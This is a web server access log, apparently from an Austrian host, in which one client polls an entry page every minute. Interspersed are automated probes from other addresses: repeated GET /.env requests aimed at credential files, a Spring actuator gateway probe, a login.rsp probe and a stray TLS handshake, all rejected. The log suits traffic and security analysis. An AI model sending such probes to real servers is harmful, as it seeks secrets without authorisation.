178.165.191.42 - - [20/Dec/2024:10:26:08 +0100] "GET /gui/javascript/form_form.js?1734686768 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=686708" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:27:08 +0100] "GET /entry.php?id=10271&&ser=686768 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=686708" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:27:08 +0100] "GET /gui/javascript/form_form.js?1734686828 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=686768" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:28:08 +0100] "GET /entry.php?id=10271&&ser=686828 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=686768" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:28:09 +0100] "GET /gui/javascript/form_form.js?1734686888 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=686828" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:29:09 +0100] "GET /entry.php?id=10271&&ser=686888 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=686828" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:29:09 +0100] "GET /gui/javascript/form_form.js?1734686949 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=686888" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
156.59.198.136 - - [20/Dec/2024:10:29:17 +0100] "GET /renault.activities.at/htdocs/dompdf-master/www/test/images/png/gray16b_bk.png HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.191.42 - - [20/Dec/2024:10:30:09 +0100] "GET /entry.php?id=10271&&ser=686949 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=686888" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:30:09 +0100] "GET /gui/javascript/form_form.js?1734687009 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=686949" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:31:09 +0100] "GET /entry.php?id=10271&&ser=687009 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=686949" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:31:09 +0100] "GET /gui/javascript/form_form.js?1734687069 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=687009" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
154.213.187.122 - - [20/Dec/2024:10:31:52 +0100] "GET /login.rsp HTTP/1.1" 404 354 "-" "Hello World"
178.165.191.42 - - [20/Dec/2024:10:32:10 +0100] "GET /entry.php?id=10271&&ser=687069 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=687009" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:32:10 +0100] "GET /gui/javascript/form_form.js?1734687130 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=687069" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:33:10 +0100] "GET /entry.php?id=10271&&ser=687130 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=687069" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:33:10 +0100] "GET /gui/javascript/form_form.js?1734687190 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=687130" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:34:10 +0100] "GET /entry.php?id=10271&&ser=687190 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=687130" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:34:10 +0100] "GET /gui/javascript/form_form.js?1734687250 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=687190" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:35:11 +0100] "GET /entry.php?id=10271&&ser=687250 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=687190" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:35:11 +0100] "GET /gui/javascript/form_form.js?1734687311 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=687250" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:36:11 +0100] "GET /entry.php?id=10271&&ser=687311 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=687250" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:36:11 +0100] "GET /gui/javascript/form_form.js?1734687371 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=687311" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
87.120.115.119 - - [20/Dec/2024:10:36:18 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.84 Safari/537.36"
178.165.191.42 - - [20/Dec/2024:10:37:12 +0100] "GET /entry.php?id=10271&&ser=687371 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=687311" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:37:12 +0100] "GET /gui/javascript/form_form.js?1734687432 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=687371" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:38:12 +0100] "GET /entry.php?id=10271&&ser=687432 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=687371" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:38:12 +0100] "GET /gui/javascript/form_form.js?1734687492 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=687432" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
45.148.10.205 - - [20/Dec/2024:10:38:53 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Linux; Android 8.0.0; SM-G930F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36"
178.165.191.42 - - [20/Dec/2024:10:39:12 +0100] "GET /entry.php?id=10271&&ser=687492 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=687432" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:39:12 +0100] "GET /gui/javascript/form_form.js?1734687552 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=687492" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
45.148.10.205 - - [20/Dec/2024:10:39:24 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.80 Safari/537.36 Vivaldi/1.0.344.37"
92.255.57.58 - - [20/Dec/2024:10:39:35 +0100] "GET /actuator/gateway/routes HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
178.165.191.42 - - [20/Dec/2024:10:40:12 +0100] "GET /entry.php?id=10271&&ser=687552 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=687492" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:40:13 +0100] "GET /gui/javascript/form_form.js?1734687612 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=687552" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:41:13 +0100] "GET /entry.php?id=10271&&ser=687612 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=687552" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:41:13 +0100] "GET /gui/javascript/form_form.js?1734687673 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=687612" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:42:13 +0100] "GET /entry.php?id=10271&&ser=687673 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=687612" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:42:13 +0100] "GET /gui/javascript/form_form.js?1734687733 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=687673" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:43:13 +0100] "GET /entry.php?id=10271&&ser=687733 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=687673" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:43:13 +0100] "GET /gui/javascript/form_form.js?1734687793 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=687733" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:44:14 +0100] "GET /entry.php?id=10271&&ser=687793 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=687733" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:44:14 +0100] "GET /gui/javascript/form_form.js?1734687854 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=687793" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:45:14 +0100] "GET /entry.php?id=10271&&ser=687854 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=687793" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:45:14 +0100] "GET /gui/javascript/form_form.js?1734687914 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=687854" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
156.59.198.136 - - [20/Dec/2024:10:45:19 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202003131403_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.191.42 - - [20/Dec/2024:10:46:14 +0100] "GET /entry.php?id=10271&&ser=687914 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=687854" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:46:14 +0100] "GET /gui/javascript/form_form.js?1734687974 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=687914" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:47:14 +0100] "GET /entry.php?id=10271&&ser=687974 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=687914" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:47:15 +0100] "GET /gui/javascript/form_form.js?1734688035 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=687974" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:48:15 +0100] "GET /entry.php?id=10271&&ser=688035 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=687974" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:48:15 +0100] "GET /gui/javascript/form_form.js?1734688095 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=688035" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:49:15 +0100] "GET /entry.php?id=10271&&ser=688095 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=688035" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:49:15 +0100] "GET /gui/javascript/form_form.js?1734688155 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=688095" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:50:15 +0100] "GET /entry.php?id=10271&&ser=688155 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=688095" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:50:16 +0100] "GET /gui/javascript/form_form.js?1734688215 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=688155" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:51:16 +0100] "GET /entry.php?id=10271&&ser=688215 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=688155" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:51:16 +0100] "GET /gui/javascript/form_form.js?1734688276 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=688215" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:52:16 +0100] "GET /entry.php?id=10271&&ser=688276 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=688215" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:52:16 +0100] "GET /gui/javascript/form_form.js?1734688336 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=688276" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:53:16 +0100] "GET /entry.php?id=10271&&ser=688336 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=688276" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:53:16 +0100] "GET /gui/javascript/form_form.js?1734688396 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=688336" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:54:17 +0100] "GET /entry.php?id=10271&&ser=688396 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=688336" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:54:17 +0100] "GET /gui/javascript/form_form.js?1734688457 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=688396" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:55:17 +0100] "GET /entry.php?id=10271&&ser=688457 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=688396" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:55:17 +0100] "GET /gui/javascript/form_form.js?1734688517 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=688457" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
92.255.57.58 - - [20/Dec/2024:10:55:33 +0100] "\x16\x03\x01\x05\xa8\x01" 400 383 "-" "-"
178.165.191.42 - - [20/Dec/2024:10:56:17 +0100] "GET /entry.php?id=10271&&ser=688517 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=688457" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:56:17 +0100] "GET /gui/javascript/form_form.js?1734688577 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=688517" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:57:17 +0100] "GET /entry.php?id=10271&&ser=688577 HTTP/1.1" 200 989 "http://hausegger.activities.at/entry.php?id=10271&&ser=688517" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:57:18 +0100] "GET /gui/javascript/form_form.js?1734688638 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=688577" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
198.235.24.220 - - [20/Dec/2024:10:57:27 +0100] "GET / HTTP/1.0" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
178.165.191.42 - - [20/Dec/2024:10:58:18 +0100] "GET /entry.php?id=10271&&ser=688637 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=688577" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:58:18 +0100] "GET /gui/javascript/form_form.js?1734688698 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=688637" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:59:18 +0100] "GET /entry.php?id=10271&&ser=688698 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=688637" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:59:18 +0100] "GET /gui/javascript/form_form.js?1734688758 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=688698" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:11:00:18 +0100] "GET /entry.php?id=10271&&ser=688758 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=688698" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:11:00:18 +0100] "GET /gui/javascript/form_form.js?1734688818 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=688758" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:11:01:19 +0100] "GET /entry.php?id=10271&&ser=688818 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=688758" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:11:01:19 +0100] "GET /gui/javascript/form_form.js?1734688879 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=688818" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:11:02:19 +0100] "GET /entry.php?id=10271&&ser=688879 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=688818" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:11:02:19 +0100] "GET /gui/javascript/form_form.js?1734688939 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=688879" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:11:03:19 +0100] "GET /entry.php?id=10271&&ser=688939 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=688879" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:11:03:19 +0100] "GET /gui/javascript/form_form.js?1734688999 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=688939" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:11:04:19 +0100] "GET /entry.php?id=10271&&ser=688999 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=688939" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:11:04:20 +0100] "GET /gui/javascript/form_form.js?1734689060 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=688999" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:11:05:20 +0100] "GET /entry.php?id=10271&&ser=689060 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=688999" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:11:05:20 +0100] "GET /gui/javascript/form_form.js?1734689120 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=689060" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:11:06:22 +0100] "GET /entry.php?id=10271&&ser=689120 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=689060" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:11:06:22 +0100] "GET /gui/javascript/form_form.js?1734689182 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=689120" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:11:07:22 +0100] "GET /entry.php?id=10271&&ser=689182 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=689120" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:11:07:22 +0100] "GET /gui/javascript/form_form.js?1734689242 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=689182" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:11:08:22 +0100] "GET /entry.php?id=10271&&ser=689242 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=689182" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:11:08:23 +0100] "GET /gui/javascript/form_form.js?1734689303 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=689242" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:11:09:23 +0100] "GET /entry.php?id=10271&&ser=689303 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=689242" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:11:09:23 +0100] "GET /gui/javascript/form_form.js?1734689363 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=689303" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
45.156.128.37 - - [20/Dec/2024:11:09:55 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
178.165.191.42 - - [20/Dec/2024:11:10:23 +0100] "GET /entry.php?id=10271&&ser=689363 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=689303" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:11:10:23 +0100] "GET /gui/javascript/form_form.js?1734689423 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=689363" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
